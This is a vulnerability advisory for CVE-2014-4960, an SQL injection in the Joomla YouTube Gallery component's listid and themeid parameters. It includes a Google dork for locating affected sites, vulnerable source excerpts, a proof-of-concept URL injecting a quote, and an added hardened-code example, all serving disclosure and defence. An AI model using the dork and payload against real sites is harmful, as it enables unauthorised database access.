Joomla! YouTube Gallery Component 'gallery.php' SQL Injection Vulnerability

Published: 2014-07-15
Updated: 2014-07-25

Affected systems:
Joomla! YouTube Gallery
Description:
BUGTRAQ ID: 68676
CVE(CAN) ID: CVE-2014-4960

YouTube Gallery is a video media management solution for Joomla!.

The YouTube Gallery (com_youtubegallery) component for Joomla!, versions 4.x through 4.1.7 and 3.x, contains multiple SQL injection vulnerabilities in models\gallery.php. A remote attacker can exploit them through the listid or themeid parameter of index.php to execute arbitrary SQL commands.

<*Source: Pham Van Khanh
  
  Link: http://www.exploit-db.com/exploits/34087/
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear all risk themselves!

# Exploit Title: Joomla component com_youtubegallery - SQL Injection vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Date: 15-07-2014
# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
# Software Link: http://www.joomlaboat.com/youtube-gallery
# Version: 4.x ( 3.x maybe)
# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
# CVE : CVE-2014-4960

Detail:
In line 40 of file components\com_youtubegallery\models\gallery.php,
if parameter listid is an int (or can be cast to int), $listid and $themeid
will not be sanitized.
Source code:
40: if(JRequest::getInt('listid'))
41: {
42:        //Shadow Box
43:        $listid=JRequest::getVar('listid');
44:
45:
46:        //Get Theme
47:        $m_themeid=(int)JRequest::getVar('mobilethemeid');
48:        if($m_themeid!=0)
49:        {
50:             if(YouTubeGalleryMisc::check_user_agent('mobile'))
51:                   $themeid=$m_themeid;
52:             else
53:                   $themeid=JRequest::getVar('themeid');
54:        }
55:        else
56:             $themeid=JRequest::getVar('themeid');
57: }
Afterwards, $themeid and $listid are used in lines 86 and 92. The two methods
getVideoListTableRow and getThemeTableRow concatenate strings to construct
the SQL query, so it is vulnerable to SQL injection.
Source code:
86: if(!$this->misc->getVideoListTableRow($listid))
87: {
88:         echo '<p>No video found</p>';
89:         return false;
90: }
91:
92: if(!$this->misc->getThemeTableRow($themeid))
93: {
94:          echo '<p>No video found</p>';
95:          return false;
96: }

# Site PoC: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700
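The root cause described above is that the getInt() gate validates a cast copy of the parameter while the query is built from the raw getVar() value. The following stand-alone PHP example is added here to illustrate that gap and the corrected pattern; it is not the component's code. JRequest is replaced by a small stand-in, the table and column names are hypothetical, and the input is the advisory's own "1'" value.

```php
<?php
// Added example (not from the component or the advisory author).
// Stand-ins for JRequest::getInt / JRequest::getVar (assumption: they
// behave like a cast and a raw read, as the advisory's code relies on).
function request_getInt(array $req, string $name): int {
    return isset($req[$name]) ? (int) $req[$name] : 0;
}
function request_getVar(array $req, string $name): string {
    return $req[$name] ?? '';
}

// Vulnerable pattern mirrored from gallery.php line 40/43:
// the gate tests the cast value, the query concatenates the raw one.
function vulnerable_query(array $req): ?string {
    if (!request_getInt($req, 'listid')) {
        return null;                       // gate only rejects non-numeric-looking input
    }
    $listid = request_getVar($req, 'listid');   // raw string, "1'" passes through
    // hypothetical table/column names for illustration
    return "SELECT * FROM #__ygallery_lists WHERE id=" . $listid;
}

// Hardened pattern: the value that reached the query is the cast integer,
// the same technique the component already applies to mobilethemeid.
function hardened_query(array $req): ?string {
    $listid = request_getInt($req, 'listid');
    if ($listid === 0) {
        return null;
    }
    return "SELECT * FROM #__ygallery_lists WHERE id=" . $listid;
}

// Constructed request using the advisory's PoC value.
$req = ['listid' => "1'"];

var_dump(request_getInt($req, 'listid'));   // int(1): the gate is satisfied
echo vulnerable_query($req), PHP_EOL;      // ... WHERE id=1'   (quote reaches SQL)
echo hardened_query($req), PHP_EOL;        // ... WHERE id=1    (quote discarded)
```

Using a bound parameter or the framework's quoting API is the general fix for the string-typed parameters; casting is sufficient only where, as with listid and themeid here, the value is meant to be an integer.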

Recommendation:
Vendor patch:

Joomla!
-------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:

http://www.joomlaboat.com/youtube-gallery
